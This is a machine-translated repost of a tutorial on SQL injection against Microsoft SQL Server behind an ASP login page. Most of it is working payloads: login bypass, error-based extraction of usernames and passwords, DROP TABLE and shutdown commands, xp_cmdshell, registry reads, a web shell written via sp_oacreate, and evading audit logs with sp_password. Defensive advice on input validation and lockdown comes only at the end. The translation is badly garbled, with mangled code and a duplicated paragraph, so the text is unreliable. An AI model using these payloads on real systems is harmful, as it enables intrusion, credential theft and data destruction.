Introduction: SQL is a structured query language for relational databases. It is divided into many species, but most of them are loosely based on the latest standard SQL-92 for the National Standardization Organization. A typical execution statement is Query, which can collect comparisonable records and return a single result set. The SQL language can modify the database structure (data definition language) and the database content (data operation language). In this document, we will specifically discuss the Transact-SQL language used by SQL Server. When an attacker can operate data written into the application by inserting a series of SQL statements into Query, we are defined as SQL injection. SQL is a structured query language for relational databases. It is divided into many species, but most of them are loosely based on the latest standard SQL-92 for the National Standardization Organization. A typical execution statement is Query, which can collect comparisonable records and return a single result set. The SQL language can modify the database structure (data definition language) and the database content (data operation language). In this document, we will specifically discuss the Transact-SQL language used by SQL Server. When an attacker can operate data written into the application by inserting a series of SQL statements into Query, we are defined as SQL injection. A typical SQL statement is as follows: Select ID, forename, Surname from authors This statement will return the ID, forename, and weak columns of all rows in the Authors table. This result can be limited, for example: select ID, forename, Surname from authors where forename'john 'and surname =' smith 'requires focus on string' john 'and' Smith 'being limited by single quotes. Clearly, the Forename and Surname field are entered by the user, and an attacker can inject some SQL statements from the input value to this query, as follows: Forename: Jo'hn Surname: SMITH Query statement becomes: SELECT ID, Forname, Surname from authors where forename = 'smith' When the database tries to perform this query, it returns the following error: Server: MSG 170, Level 15, State 1, Line 1 Line 1: The reason for this result is inserted. The single quotes of the delimiter. The database attempts to perform 'hn', but failed. If an attacker offers special inputs such as: Forename: JO '; Drop Table Authors- Surname: The result is that the Authors table is deleted, causing this result. We will talk later. It seems that you can solve this problem by getting a single quotation from the input or avoiding them. This is feasible, but there are several difficulties in making a solution with this method. First, not all users provide data is a string.
If the user enters an AUTHOR, then our query should be like this: SELECT ID, FORENAME, Surname from authors where id = 1234 In this case, an attacker can add very simple to the end of the numbers. SQL statement, in other versions of SQL languages, use a variety of qualified symbols; in the Database Management System JET engine, the data can be limited by '#'. Second, avoid single quotes, although it can be seen, it is not necessary. For the reason, we will talk later. We further use a simple ASP login page to point out who can enter the SQLServer database and try to authenticate access to some fictional applications.
This is a code submitting a single page, allowing users to enter usernames and passwords:
login page </ title> </ head> <body bgcolor = '000000' text = 'cccccc'> <font Face = 'Taoma' color = 'cccccc'> <center> <h1> login </ h1> <form action = 'process_loginasp' method = post> <table> <tr> <td> username: </ td> <td > <Input Type = TEXT Name = UserName Size = 100 Width = 100> <TD> </ TD> PASSWORD: </ TD> <TD> <input type = password name = password size = 100 WITHD = 100> </ td> </ tr> </ table> <input type = submit value = 'Submit'> <input type = reset value = 'reset'> </ form> </ font> </ body> </ Html> The following is the code of Process_login.asp, which is used to control the login: <html> <body bgcolor = '000000' text = 'fffff'> <font face = 'Taoma' color = 'ffffff'> < Style> P {font-size = 20pt! Important} font {font-size = 20pt! Important} h1 {font-size = 64pt! Important} </ stop> <% @ language = jscript%> <% Function Trace (STR ) {IF ("debug") == "true") response.write (str);} Function login (cn) {var username; var password; username = request.form ("username"; password); Password = Request.form ("P "); var = server.createObject (" adoDb.recordset "); var sql =" select * from username where username = '" username " " " Password " Password </p>
<p>"'"; trace ("query:" SQL); rso.open (SQL, CN); if (rso.Eof) {r r {rclose ();%> <font face =' tahoma 'color =' cc0000 ' > <H1> <BR> <BR> <CENTER> ACCESS DENIED </ CENTER> </ H1> </ BODY> </ HTML> <% Response.end return;} else {Session ( "username") = "" rso ( "username");%> <FONT Face = 'tahoma' color = '00cc00'> <H1> <CENTER> ACCESS GRANTED <BR> <BR> Welcome, <% Response.write (rso ( "username" )))); Response.write ("</ body> </ html>"); response.end}} function main () {// set up connections var username var cn = server.createObject ("adodb.connection"); Cn.connectionTIMEOUT = 20; CN.Open ("LocalServer", "SA", "password"); username = new string (Request.form ("UserName")); if (username.length> 0) {login (CN ); cn.close ();} main ();%> Problem is part of Process_lgin.asp to produce a query statement in Query statement: Var SQL = "SELECT * from users where username = '" username "' and password = '" password " "; if the information entered by the user is as follows: username:'; Drop Table Users- Password: Database Database Table Users will be deleted, reject any user to enter the application. '-' symbols in Transact-SQL indicate ignoring '-' future statements, ';' symbol represents the end of a query and the beginning of another query. '-' is a must be in the username field, which is to terminate this special query and do not return an error.</p>
<p>The attacker can only provide the username they know, you can log in with any user, use the following: username: admin'-attacker can use the first user in the UserS table, enter the following: username: 'or 1 = 1 - More specifically, an attacker can log in with a completely fiction, enter the following: username: 'Union Select 1,' fictional_user ',' some_password ', 1 - This reason is that the application believes that the attacker specifies from A part of the result is returned in the database. Getting information by error message This is almost discovered by David Litchfield, and is tested by the author infiltration; later David wrote a document, and later the author refers to this document. These explanations discussed the 'error message' potential mechanism to enable the reader to fully understand it, potentially triggering their ability. In order to operate data in the database, the attacker must determine some databases and some tables of structures. For example, we can create a USER table using the following statement: Create Talbe Uses (ID INT, Username VARCHAR (255), Password Varchar (255), PASS INT) then insert the following users in the UserS table: Insert Into Users Values (0, 'admin', 'R00TR0X!', 0xfff) Insert INTO Users Values (0, 'Guest', 'Guest', 0x0000) Insert INTO Users Values (0, 'Chris', 'Password', 0x00FF) Insert Into Users VALUES 0, 'Fred', 'SESAME', 0x00FF) If our attacker wants to insert a self. He can't succeed if you don't know the USERS table structure. Even if he is more fortunate, it is not clear to the PRIVS field. An attacker may insert a '1', which gives him a low authority user. Fortunately, if an error message is returned from the application (default as an ASP behavior), the attacker can determine the structure of the entire database and can connect to the permissions of SQLServer in the program. (Below below with a simple database and ASP script, how do they work) First, the attacker wants to get the name and field of the establishment of the user's table, to do this, the attacker needs to use the SELECT syntax haVing clause : Username: 'Having 1 = 1 - This will appear as follows: Microsoft Ole DB Provider for ODBC Drivers Error' 80040E14 '[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column' Users.id 'Is Invalid in The SELECT LIST BECAUSE IS NOT Conta In Aggregate Function and the no group by clause. /process_login.asp, line 35 So now the attacker knows the name of the table and the name of the first location.</p>
<p>They can still put the fields to the group by clause, only I can find a field name, as follows: username: 'group by users.id Having 1 = 1 - The error occurred as follows: Microsoft OLE DB Provider for ODBC Drivers Error '80040e14' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /process_login.asp, line 35 The final attacker gets the UserName field: 'group by users.id, users.username, users.password, users.privs haVing 1 = 1 - This sentence does not generate errors, equivalent to: Select * from users where username = '' Therefore, an attacker now knows that the query involves the UserS table, using column 'ID, username, password, privs' in order. It is very useful to determine the type of each column. This can be implemented by using type conversion, for example: username: 'union select sum (username) from users - This uses SQLServer to determine if the fields of the two result sets are equal to the SUM clause. Try to calculate the sum will get the following message: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] The sum or average aggregate operation can not take a varchar data type as an argument /. Process_login.asp, line 35 This tells our 'username' field type to varchar. If it is another case, we try to calculate SUM () is a digital type, and we get the error message tells us that the number of fields of the two collections is not equal. Username: 'union select sum (id) from users- Microsoft OLE DB Provider for ODBC Drivers error' 80040e14 '[Microsoft] [ODBC SQL Server Driver] [SQL Server] All queries in an SQL statement containing a UNION operator must have an equal Number of Expressions In Their Target Lists. /Process_Login.asp, Line 35 We can use this technology to approximate the type of any fields in any table in the database. Such an attacker can write a good INSERT query, for example: username: '; Insert Into Users Values (666,' Attacker ',' Foobar ',' 0xFFFF) - The potential impact of this technology is not just these. An attacker can use these error messages to display environmental information or databases.</p>
<p>The standard error message can be obtained by running a list of strings in a certain format: select * from master ..sysments explains these will implement interesting messages. A particularly useful message is related to type transformation. If you try to convert a string into an integer number, all contents of the string will return to the error message. For example, in our simple landing page, you will display the version of SQL Server and the running operating system information after UserName: username: 'union select @@ version, 1,1,1- Microsoft Ole DB Provider for ODBC Drivers Error' 80040e07 '[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value' Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise Edition On Windows NT 5.0 (Build 2195: Service Pack 2) 'TO A Column of Data Type Int. /Process_Login.asp, Line 35 This tries to convert the built-in' @@ version 'constant into a integer number Because the first column in the UserS table is an integer number. This technique can be used to read any of the values of any table in the database. Since the attacker is more interested in the username and user password, they prefer to read the username from the userS table, for example: username: 'union select min (username), 1, 1 from users where username>' A '- This sentence selects the minimum value in the username in' a ', and try to convert it into a integer number: Microsoft Ole DB Provider for ODBC Drivers Error' 80040E07 '[Microsoft] [ODBC SQL Server Driver] [ SQL Server] Syntax Error Converting The VARCHAR VALUE 'Admin' to a Column of Data Type Int. /Process_Login.asp, Line 35 Therefore, an attacker already knows that user admin is exist. This way he can repeat the next user by using the WHERE clause and the user name.</p>
<p>Username: 'union select min (username), 1,1,1 from users where username>' admin'- Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error Converting the varcharue 'chris' to a column of data type int. /Process_login.asp, Line 35 Once the attacker determines the username, he can start collecting password: username:' Union Select Password, 1,1,1 from users where username = 'admin'- Microsoft OLE DB Provider for ODBC Drivers error' 80040e07 '[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the varchar value' r00tr0x! 'to a column of data type int. /Process_login.asp, Line 35 A more advanced technology is to connect all usernames and passwords to a separate string and try to convert it into integer numbers. This example stated that the Transavt-SQL syntax can connect them without changing the same line. The following script will connect the value: Begin Declare @Ret Varchar (8000) set @ Ret = ':' select @ Ret = @ RET '' Username '/' Password from users where username> @ret select @ret as RET INTO FOO END attacker uses this as a username login (all in one line) username: ''; begin declare @ret varchar (8000) set @ Ret = '': 'SELECT @ Ret = @ RET ' '' ' Username '' / '' password from users where username> @ret select @ret as return @ret selection - This creates a Foo table, there is only one separate column 'Ret' ', which is stored in us to get The username and the string of the password. Under normal circumstances, a low authority can create a table in the same database or create a temporary database.</p>
<p>Then the attacker can get the string we have to get: username: '' union Select Ret, 1, 1, 1 from fo- Microsoft Ole DB Provider for odbc drivers error '' '80040E07' '[Microsoft] [ODBC SQL Server Driver ] [SQL Server] Syntax Error Converting The VARCHAR VALUE '': Admin / R00TR0X! Guest / Guest Chris / Password Fred / SESAME '' '' TO A Column Of Data Type Int. /Process_Login.asp, Line 35 Then Discard (Delete) Table Come clear footprints: username: ''; Drop Table foo- This example is just a surface of this technology. It is not necessary to say that if an attacker can get enough mistakes from the database, their work will become unlimited. Get higher privileges once the attacker controls the database, they want to use that permissions to get higher control over the network. This can be achieved by many ways: 1. On the database server, use the XP_cmdshell extension stored procedure execution command with SQLServer permissions. 2. Use the XP_REGREAD extended stored procedure to read the key value of the registry, of course, including the SAM key (provided SQLServer is run by system authority) 3. Use other stored procedures to change the server 4. Execute Query 5 on the connected server. Creating a customer extension stored procedure to perform overflow code in the SQL Server process 6. Use the '' Bulk INSERT 'syntax to read any file on the server 7. Use the BCP to create files on any text format on the server 8. Using sp_oacreate, sp_oAmethod And sp_oagetproperty system stored procedures to create an ActiveX application, making it possible to do any ASP scripts that only list very common possible attack methods, and attackers are likely to use other methods. We introduce the collection of attacks on the obvious attack method of the SQL server, in order to explain which aspect may be, and the permissions are permissions to inject SQL .. We will process the various methods mentioned above: [xp_cmdshell] Many stored procedures are created in SQL Server, perform a wide variety of features, such as sending emails and interact with registry. XP_cmdshell is a built-in stored procedure that allows an arbitrary command line command. For example: Exec master..xp_cmdshell '' Dir '' will get a list of directory in the current working directory of the SQL Server process. Exec master..xp_cmdshell '' Net User '' will provide a list of all users on the server. When SQL Server is running in a system account or domain account, an attacker can make a more serious harm. [XP_REGREAD] Another useful built-in stored procedure is a function set of XP_REGXXXX classes.</p>
<p>Xp_regaddmultistring Xp_regdeletekey Xp_regdeletevalue Xp_regenumkeys Xp_regenumvalues Xp_regread Xp_regremovemultistring Xp_regwrite the use of functions for example as follows: exec xp_regread HKEY_LOCAL_MACHINE, '' SYSTEMCurrentControlSetServiceslanmanserverparameters '', '' nullsessionshares '' which will determine what session connection on the server can be used exec xp_regenumvalues HKEY_LOCAL_MACHINE, '' SystemCurrentControlSetServicesNMPArametersvalIDCommunities '' This will display all SNMP group configuration on the server. In the case where the SNMP group is rarely changed and shared between many hosts, this information, the attacker may reconfigure the network device in the same network. This is easy to imagine an attacker to read SAM using these functions, modify the configuration of the system service, start it when the machine is restarted, or executes an arbitrary command when you log in next time. [Other stored procedures] XP_ServiceControl procedure allows users to start, stop, suspend, and continue: exec master.. '' ',' 'Schedule' 'exec master..xp_serviceControl' 'Start' ',' 'Server' ' the following table lists a small number of other useful stored procedure: xp_availablemedia exhibit useful drive machine Xp_dirtree allow to obtain a tree Xp_enumdsn include ODBC data source xp_loginconfig Reveals information on the server about the security mode of the server Xp_makecab allow the user to the server Create a compressed file xp_ntsec_enumdomains Enumeral Enumeral Entering the Domain XP_TERMINATE_PROCESS to provide a process ID of the process, terminating this process [Linked Servers] SQL Server provides a mechanism that allows the server connection, that is, allowing a query on a database server to be able to Operate the data on another server. This link is stored in the master.sysservers table. If a connection server has been set to use the '' sp_addlinkedsrvlogin '' process, the currently trusted connection can be accessed to the server without logging in. The '' OpenQuery '' function allows query out of the server to be executed. [Custom Extended Stored Procedures] Extended stored procedure application interface is quite simple, create a malicious code extended stored procedure Dynamic Library is a fairly simple task. There are several ways to use the command line to upload dynamic connection libraries to the SQL server, and other communication mechanisms including multiple automatic communication, such as HTTP download and FTP scripts.</p>
<p>Once the dynamic connection library file runs on the machine, the SQL server can be accessed - this does not need it to be a SQL server - an attacker can add an extended stored procedure using the following command (in this case, our malicious stored procedure It is a small Trojan that outputs a system file of the server): sp_addextendedProc '' XP_WEBSERVER '', '' 'C: Empxp_foo.dll' 'In normal mode, this extended stored procedure can be run: EXEC XP_WEBSERVER Once this program is Operation, you can remove it below: xp_dropextendedProc '' 'XP_WEBSERVER' '[Will Import Text Form] Use the' 'Bulk Insert' syntax to insert a text file into a temporary table. Simply create this table: CREATE TABLE FOO (Line Varchar (8000)) Then perform BULK INSERT operations to insert the data in the file into the table, such as: bulk insert foo from '' c: inetpubwwwrootprocess_login.asp '' can use the above Error message technology, or use 'union' 'to select, the data in the text file is combined with the data returned by the application, and the data is retrieved. This is very useful for the script source code or ASP script code stored on the database server or the ASP script code. [Establish text files using BCP] Any text file can be easily established using '' BULK INSERT '' relative technology. Unfortunately, this requires command line tools. '' bcp '', the '' Bulk Copy Program '' Since BCP can access the database from the SQL service process, it needs to be logged in. This means is not very difficult, and since the attacker can build, or use the overall security mechanism (if the server is configured to use it). The command line format is as follows: BCP "Select * from text..foo" Queryout C: inetpubwwwroot uncommand.asp -c -slocalhost -usa -pfoobar '' s' 'parameter is the server that executes queries,' U '' parameters are users Name, '' p '' parameter is a password, here's '' Foobar '' [ActiveX Automation Scripts in SQL Server] SQL Server provides several built-in storage procedures for creating ActiveX automatic scripts. These scripts and scripts running under the Windows script interpreter, or the ASP script - they use VBScript or JavaScript, and they create automatic execution objects and interact with them. An automatic execution script uses this method to write anything that can be done in the ASP script in Transact-SQL, or anything you can do in the WSH script.</p>
<p>In order to clarify this shoe, there are several examples: (1) This example uses the '' wscript.shell '' object to establish a notepad case: wscript.shell example declare @o int exec sp_oacreate '' wscript.shell ' ', @ o Out EXEC SP_OAMETHOD @o,' 'Run' ', NULL,' 'NOTEPAD.EXE' '' We can perform it by specifying it: username: ''; declare @o int exec sp_oacreate ' Wscript.shell '', @ o Out EXEC SP_OAMETHOD @o, '' 'Run' ', NULL,' 'NOTEPAD.EXE' '- (2) This example uses'' scripting.filesystemObject '' object read a known text. file: --scripting.filesystemobject example - read a known file declare @o int, @f int, @t int, @ret int declare @line varchar (8000) exec sp_oacreate '' scripting.filesystemobject '', @o out exec Sp_oAmethod @o, '' OpenTextFile '', @f out, '' c: OT.INI '', 1 exec @ Ret = sp_oamethod @f, '' readline '', @ line out while (@ Ret = 0) Begin Print @line exec @ RET = sp_oamethod @f, '' readline '', @ line out end (3) This example creates any command that can perform by submitted: - scripting.filesystemObject Example - Create A 'Run This ''. ASP file declare @o int, @ f int, @ t int, @ Ret int exec sp_oacreate '' scripting.FilesystemObject ', @ o out exec sp_oamethod @o,' 'cretetextfile', @ f out, '' C: i Netpubwwwrootfoo.asp ', 1 exec @ Ret = sp_oamethod @f,' 'writeLine' ', null,' '<% set o = server.createObject ("wscript.shell": o.run (Request.QueryString) CMD "))%> '' needs to point out if the running environment is on the WIN NT4 IIS4 platform,</p>
<p>Then running through this program is running by system authority. In IIS5, it runs with a relatively low permission IWAM_XXXACCOUNT. (4) These examples describe the application of this technology; it can use '' speech.voicetext '' objects to cause SQL Server vocal: declare @o int, @ Ret int exec sp_oacreate '' Speech.VoiceEtext ', @ o Out EXEC SP_OAMETHOD @o, '' register ', null,' 'foo' ',' 'Bar' 'exec sp_oasetproperty @o,' 'speed' ', 150 exec sp_oamethod @o,' 'speak', null, ' 'all your sequel servers are belong to, us'', 528 waitfor delay '' 00: 00: 05 '' We can perform it in our assumed example, by specifying it behind the username (note this example is not just Inject a script while logging in to the application at the application): username: admin '; declare @o int ', NULL,' 'foo', '' Bar '' EXEC SP_OASETPROPERTY @o, '' speted '', 150 Exec sp_oamethod @o, '' speak '', null, '' All Your Sequel Servers Are Belong To US '', 528 WAITFOR DELAY '' '' 00: 00: 05 '- [Stored Procedure] Legend If an ASP application uses a stored procedure in the database, then SQL injection is impossible. This sentence is only half of it, it depends on how to call this stored procedure in the ASP script. Essentially, if an parameter query is executed, and the parameters provided by the user are put into the query by security check, then SQL injection is obviously impossible. But if an attacker strives to affect the non-data part of the query statement, they may be able to control the database. A preferred conventional standard is:? If an ASP script can generate a submitted SQL query string, even if it uses the stored procedure, it is also possible to cause SQL injection weaknesses. • If an ASP script uses a process object restricted parameter to allocate (such as the Command object for the ADO for parameters), then through this object, it is generally secure. Obviously, since the new attack technology is always found, a good convention is still verifying all the inputs.</p>
<p>In order to clarify the query injection of the stored procedure, the following statement is performed: sp_who '' 1 'SELECT * from sysObjects or sp_who' '1'; select * from sysobjects Any method, after the stored procedure, the additional query is still executed . [Advanced SQL Injection] Normally, a web application will filter a single quotation number (or other symbol), or limit the length of the data submitted by the user. In this section, we discuss some techniques that can help attackers to make it clearly to prevent SQL injection, avoiding recorded. [String without single quotes] Sometimes developers protect the application by filtering all single quotes, they might use the Replace function in VBScript: Function Escape (Input) Input = Replace (Input, "''" "'' ''") escape = input end function can not be denied, this prevents all of our examples, and then remove ''; '' symbols can also help it. But in a large application, it seems that the individual values expect users to enter numbers. These values are not limited, so the attacker provides an weak point of SQL injection. If an attacker wants to generate a string value without using a single quotation, he can use a char function, for example: Insert Into Users Values (666, Char (0x63) Char (0x68) CHAR (0x72) CHAR90X69) Char (0x73 ), char (0x63) char (0x68) char (0x72) char90x69) char (0x73), 0xfff) This is a query that can be inserted into a string inserted into a string. Land, if an attacker does not mind using a digital user name and password, the following statement will also work: Insert INTO Users Values (667, 123, 123, oxfff) SQL Server automatically converts integer to VARCHAR type values. [Second-Order SQL INJECTION] Even if the application is always filtering single quotes, an attacker still injects SQL and also reuses the data in the database through the application. For example, an attacker may use the following information to register in an application: username: admin '- password: password application correctly filtered the single quotes, returned a similar insert statement: INSERT INTO USERS VALUES (123,' ' Admin '' '' '-' ',' 'Password' ', 0xFFF) We assume that the application allows the user to modify its own password. This ASP script first guarantees the user to set the correct old password before setting the new password.</p>
<p>The code is as follows: username = escape (Request.form ("UserName")); OldPassword = escape (Request.form ("Oldpassword")); newpassword = escape (Request.form ("NewPassword"); var = server. CreateObject ("AdoDb.Recordset"); var sql = "select * from username where username = ''" username "'' and password = ''" Oldpassword "'"; rso.open (SQL, CN) ); if (rso.eof) {... set new password code as follows: SQL = "Update users set password = ''" newpassword "'where username =' '" RSO ("UserName") "' '"RSO (" UserName ") When the user returned in the login query is used for admin' '-, the query statement is: update users set password =' 'password' 'where username =' add '' - '' Such an attacker can set an admin's password according to its own idea by registering an admin '' - user. This is a very serious problem, currently trying to filter data in large applications. The best solution is to refuse illegal inputs, which is better to try to modify it. This sometimes causes a problem, illegal characters are there, such as the '' symbol in the username, such as O''Brien from a security point of view, the best solution is that the quotation is not allowed to exist. A simple fact. If this is unacceptable, they still have to be filtered; in this case, all data that enters the SQL query is the best way. If an attacker does not use any app inexplicably inserted into the system, the attack is also possible. The application may have an email interface, or may store the error log in the database so that an attacker can work hard to control it. Verify all data, including the data already existing in the database is always a good method. The confirmation function will be simply called, for example: if isvalid ("email", request.QueryString ("email")) The response.end or a similar method. [Length Restriction] In order to give attackers more difficult, sometimes the length of input data is limited. When this hinders attacks, a small SQL can cause very serious harm. For example: username: ''; shutdown - This will stop the SQL Server instance using only 12 input characters. Another example is: DROP TABLE <TABLENAME> If the limit length is after the filter string will cause another problem.</p>
<p>Suppose the username is limited to 16 characters, the password is also limited 16 characters, then the following username and password will perform the shortdown command mentioned above: username: Aaaaaaaaaaaaa '' PASSWORD: ''; shutdown-reason is the application Try to filter the last single quotes of the username, but the string is cut into 16 characters and delete a single quotes after filtering. Such a result is that if the password field begins with single quotation, it can contain some SQL statements. Since the query looks: select * from users where username = '' aaaaaaaaaaaaa '' '' 'and password =' '' ''; shutdown - actually, the username in the query has changed to: AAAAAAAAAAAAAAA '' and Password = '' So the last SQL statement will be executed. [Audit] SQL Server includes a wide audit interface that allows various events in the database, which is included in the SP_Tracexxx class. It is especially interesting that all SQL statements can be recorded, then the T-SQL events executed on the server. If this audit is activated, all injected SQL queries we discussed will be recorded in the database, and a skilled database administrator will know what happened. Unfortunately, if an attacker appended the string: sp_password to a Transact-SQL statement, this audit mechanism record the log as follows: - '' sp_password '' Was Found in The Text of this Event. - The Text Has Been Replaced This behavior occurs in all T-SQL diary records, even if '' sp_password '' occurs in one comment. This process intends to hide the user's password through sp_password, but this is a very useful method for an attacker. Therefore, in order to hide all injections, the attacker needs to simply add sp_password after the '' - '' comment character, for example: username: admin '- sp_password, in fact, some SQL executed will be recorded, but the query itself will be smooth Disappeared from the log. [Prevent] This section discusses some of the prevention of the attack on the description. We will discuss input confirmation and provide some simple code, and then we will engage in SQL Server lock. [Enter verification] Enter verification is a complex topic. More representative is that since it is too closely confirmed that the temporary temporarity temporarily caused, the input confirmation is difficult to resolve, and there are few attention to the project development to confirm. The input confirmation is not a function of inclined it to the application's function, so it is generally ignored. Below is an outline of discussion input confirmation with simple code. This simple code cannot be used directly in the application, but it clearly clarifies different strategies. Different data confirmation methods can be classified by: 1) Efforts to modify data to make it correct 2) Refuse to be input 3) Only receiving a conceptual problem that is considered to be correct. First, developers don't have to know that those are wrong data, because the form of new error data is always found. Second, modifying the data will cause the length problem of the data described above.</p>
<p>Finally, the problem of secondary use includes reuse that already exists in the system. The second case also has problems in the first case; known error inputs with the development of attack technologies. The third case may be the best in three, but it is difficult to implement. From a security perspective, the second method and the third method may be the best way - only the correct input, then search for the error data known in the input. Problems with Names with Connection Symbols For the need to merge two methods: quentin Bassington-Bassington We must allow connection symbols in the correct input, but we also realize characters' '' - '' SQL Server is important. Another problem occurs when merging and modifying data and character sequence confirmation. For example, if we apply an error filtering to detect '' - '', 'select' 'and' 'union' 'after removing single quotes, the attacker can enter: uni''on sel''ect @@ version- '' - Since single quotes are removed, the attacker can simply spread the single quotuary to avoid discovery in their own wrong string. This has some examples of confirmation code: Method 1 - Filter single quotes FUNCAPE (INPUT) INPUT = Replace (Input, "''", "'' ') Escape = input end function 2 - Deny known Error Input Function Validate_String (Input) KNown_Bad = Array ("SELECT", "INSERT", "Update", "Delete", "DROP", "-", "'") Validate_String = True for i = lbound (known_bad ) to ubound (inn (1, input, known_bad (i), vbtextcompare) <> 0) Then Validate_String = false exit function end if next end function method three - only the correct input Function ValidatePassword (INPUT) good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" validatepassword = true for i = 1 to len (input) c = mid (input, I, 1) if (InStr (good_password_chars, c) = 0) then validatepassword = false exit function end if next end function [ SQL Server Locks] It is important to lock SQL Server in this; not safe outside. This is a short list of things that you need to do when you create SQL Server: 1. Determine how to connect the server a. Make sure the network library you use is available, then use "NetWork Utility" 2. OK which account is existed A. Create a low permissions of accounts b. Delete unnecessary account c. Determine all accounts have strong password; execute password audit 3. Determine which objects exist a. Many extended stored procedures can be safely Remove.</p></div><div class="text-center mt-3 text-grey">
转载请注明原文地址:https://www.9cbs.com/read-95756.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>)
</div><div></div></div></div><ul class="postlist list-unstyled">
</ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="95756" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved
</div><div class="col text-right">Processed:
<b>0.044</b>, SQL:
<b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script>
var debug = DEBUG = 0;
var url_rewrite_on = 1;
var url_path = './';
var forumarr = {"1":"Tech"};
var fid = 1;
var uid = 0;
var gid = 0;
xn.options.water_image_url = 'view/img/water-small.png';
</script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script>
var forum_url = 'list-1.html';
var safe_token = 'pl8L8ripIJ2j_2FwyBofZoRxhANoyivkKqmARgRxoZ0ixFcVP_2BgyBlRJCItXTyrh_2FaakV69ZYzq4_2FU_2Fp14gqvV1w_3D_3D';
var body = $('body');
body.on('submit', '#form', function() {
var jthis = $(this);
var jsubmit = jthis.find('#submit');
jthis.reset();
jsubmit.button('loading');
var postdata = jthis.serializeObject();
$.xpost(jthis.attr('action'), postdata, function(code, message) {
if(code == 0) {
location.reload();
} else {
$.alert(message);
jsubmit.button('reset');
}
});
return false;
});
function resize_image() {
var jmessagelist = $('div.message');
var first_width = jmessagelist.width();
jmessagelist.each(function() {
var jdiv = $(this);
var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width();
var jmessage_width = Math.min(jdiv.width(), maxwidth);
jdiv.find('img, embed, iframe, video').each(function() {
var jimg = $(this);
var img_width = this.org_width;
var img_height = this.org_height;
if(!img_width) {
var img_width = jimg.attr('width');
var img_height = jimg.attr('height');
this.org_width = img_width;
this.org_height = img_height;
}
if(img_width > jmessage_width) {
if(this.tagName == 'IMG') {
jimg.width(jmessage_width);
jimg.css('height', 'auto');
jimg.css('cursor', 'pointer');
jimg.on('click', function() {
});
} else {
jimg.width(jmessage_width);
var height = (img_height / img_width) * jimg.width();
jimg.height(height);
}
}
});
});
}
function resize_table() {
$('div.message').each(function() {
var jdiv = $(this);
jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>');
});
}
$(function() {
resize_image();
resize_table();
$(window).on('resize', resize_image);
});
var jmessage = $('#message');
jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); });
jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); });
$('#nav li[data-active="fid-1"]').addClass('active');
</script>
